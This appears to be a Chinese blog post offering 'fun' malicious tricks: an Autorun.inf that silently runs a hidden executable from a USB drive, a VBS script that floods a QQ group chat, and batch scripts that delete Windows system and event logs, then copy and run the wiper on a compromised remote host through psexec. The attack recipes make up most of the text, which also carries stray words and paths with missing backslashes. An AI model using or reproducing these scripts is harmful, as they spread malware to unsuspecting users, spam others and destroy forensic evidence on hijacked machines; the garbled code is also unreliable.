恶意文件小乐趣
一、将可执行恶意文件放入U盘。并设置隐藏。
shell
二、建立文件 Autorun.infide
三、写入内容:
测试
[AutoRun] OPEN=恶意文件全名 shellexecute=恶意文件全名 shell\Atuo\command=恶意文件全名
隐藏本文件。spa
四、当U盘插入新的设备,操做人员双击U盘图标查看U盘时,会自动运行恶意文件。日志
VBS脚本,QQ群聊刷屏:ip
新建vbs后缀文件。内容以下:it
Set WshShell= WScript.CreateObject("WScript.Shell")
WshShell.AppActivate "群聊刷屏测试"
for i=1 to 10
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next
#for i=1to 10”语句用来控制发送次数,表示发送10次class
打开一个群聊天窗口并复制要发送的内容到剪贴板上,双击刚才生成的“qq.vbs”切换到群聊天窗口中,在其中可看到已自动刷屏了。file
日志清除:command
新建del.bat脚本
@del c:winntsystem32logfiles*.* @del c:winntsystem32config*.evt @del c:winntsystem32dtclog*.* @del c:winntsystem32*.log @del c:winntsystem32*.txt @del c:winnt*.txt @del c:winnt*.log @del c:del.bat
新建clean.bat
@copy del.bat \%1c$ @echo 向肉鸡复制本机的del.bat ……OK @psexec \%1 c:del.bat @echo 在肉鸡上运行del.bat ,清除日志文件……OK
相关文章
- 1. MpCmdRun恶意文件下载
- 2. 恶意软件
- 3. 无文件形式的恶意软件:了解非恶意软件攻击(2)
- 4. Xposed恶意插件
- 5. 前端开发小乐趣
- 6. 趣文:巧用CSS文件,愚人节极客式恶搞
- 7. Linux恶意软件简史
- 8. Android恶意软件分析
- 9. ATMJaDi恶意软件分析
- 10. 恶意扫描软件
- 更多相关文章...
- • R XML 文件 - R 语言教程
- • R CSV 文件 - R 语言教程
- • Docker容器实战(七) - 容器眼光下的文件系统
- • SpringBoot中properties文件不能自动提示解决方法
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. MpCmdRun恶意文件下载
- 2. 恶意软件
- 3. 无文件形式的恶意软件:了解非恶意软件攻击(2)
- 4. Xposed恶意插件
- 5. 前端开发小乐趣
- 6. 趣文:巧用CSS文件,愚人节极客式恶搞
- 7. Linux恶意软件简史
- 8. Android恶意软件分析
- 9. ATMJaDi恶意软件分析
- 10. 恶意扫描软件